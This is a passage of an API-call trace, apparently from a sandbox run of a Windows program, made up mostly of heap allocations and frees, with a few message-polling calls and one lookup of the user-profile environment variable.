0x2a77cd8 [0222.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854ec0 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0222.129] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.129] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38546c8 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0222.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0222.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0222.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0222.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0222.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0222.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0222.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0222.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0222.132] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0222.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0222.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0222.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0222.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0222.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0222.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0222.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 